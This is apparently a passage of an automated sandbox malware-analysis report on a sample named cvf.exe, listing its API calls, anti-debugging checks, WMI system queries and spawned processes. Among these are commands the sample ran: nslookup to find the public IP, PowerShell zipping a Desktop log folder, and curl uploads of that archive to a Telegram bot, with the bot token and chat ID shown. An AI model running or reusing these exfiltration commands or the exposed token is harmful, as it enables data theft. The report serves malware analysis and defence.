Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6590Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1339Jump to behavior
Source: C:\Users\user\Desktop\cvf.exeAPI coverage: 8.2 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep count: 6590 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 1339 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BDE041 FindFirstFileExW,0_2_00BDE041
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BB22D0 Concurrency::cancel_current_task,FindFirstFileA,CopyFileA,FindNextFileA,CreateDirectoryA,GetLastError,FindClose,SHGetFolderPathA,0_2_00BB22D0
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC77E6 FindClose,FindFirstFileExW,GetLastError,0_2_00BC77E6
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC783D GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,0_2_00BC783D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: curl.exe, 00000008.00000003.1184284536.0000000002DE0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1245496882.0000000003080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: curl.exe, 0000001E.00000003.1414416949.00000000029C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: curl.exe, 0000000A.00000003.1217366376.0000000003640000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1217555905.0000000003643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: curl.exe, 00000013.00000003.1277931569.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC9555 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC9555
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BDF1B0 GetProcessHeap,0_2_00BDF1B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC92F8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BC92F8
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC9555 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC9555
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC96B1 SetUnhandledExceptionFilter,0_2_00BC96B1
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BD1899 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BD1899
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.comJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.comJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"Jump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.comJump to behavior
Source: C:\Users\user\Desktop\cvf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.comJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AddressJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V resolver1.opendns.comJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.jsonJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr Address
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"Jump to behavior
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC8FC5 cpuid 0_2_00BC8FC5
Source: C:\Users\user\Desktop\cvf.exeCode function: GetLocaleInfoW,0_2_00BD80CB
Source: C:\Users\user\Desktop\cvf.exeCode function: EnumSystemLocalesW,0_2_00BE118E
Source: C:\Users\user\Desktop\cvf.exeCode function: EnumSystemLocalesW,0_2_00BE1143
Source: C:\Users\user\Desktop\cvf.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00BE12B4
Source: C:\Users\user\Desktop\cvf.exeCode function: EnumSystemLocalesW,0_2_00BE1229
Source: C:\Users\user\Desktop\cvf.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00BC75DE
Source: C:\Users\user\Desktop\cvf.exeCode function: GetLocaleInfoW,0_2_00BE1507
Source: C:\Users\user\Desktop\cvf.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00BE1630
Source: C:\Users\user\Desktop\cvf.exeCode function: GetLocaleInfoW,0_2_00BE1736
Source: C:\Users\user\Desktop\cvf.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00BE180C
Source: C:\Users\user\Desktop\cvf.exeCode function: EnumSystemLocalesW,0_2_00BD7B9F
Source: C:\Users\user\Desktop\cvf.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00BE0E97
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
